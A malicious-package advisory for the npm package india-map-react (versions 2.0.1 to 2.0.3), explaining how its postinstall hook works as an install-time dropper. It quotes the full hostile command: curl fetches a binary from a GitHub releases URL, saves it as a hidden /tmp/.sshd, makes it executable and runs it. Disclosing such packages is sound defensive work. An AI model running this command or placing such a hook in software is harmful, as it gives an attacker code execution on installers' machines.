VYPR

npm · Malicious package advisory

Malware

india-map-react

MAL-2026-5542

Malicious code in india-map-react (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (a1de9d093e23698e3ad3f0336a7619bd43049d1f62b822744733a48060b51a4a)
package.json declares a postinstall hook that runs `curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2>/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd &`. On every `npm install`, this fetches a binary from a GitHub account ('parikhpreyash4') unrelated to the npm publisher ('yuvrajDurgesh'), with TLS verification disabled (`-k`), follows redirects (`-L`), suppresses all errors (`2>/dev/null`), stages the binary under a deceptive hidden path masquerading as the SSH daemon (`/tmp/.sshd`), marks it executable, and runs it in the background. The URL uses the mutable `latest/download` alias rather than a pinned release with a verified hash, so the author can swap the executed bytes at any time. The package advertises itself as a React component for rendering an India map — there is no legitimate reason for it to fetch and execute a native binary named after a system network daemon. This is a textbook install-time dropper granting arbitrary code execution on every installer's machine.

Compromised versions (3)

  • 2.0.2
  • 2.0.3
  • 2.0.1

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.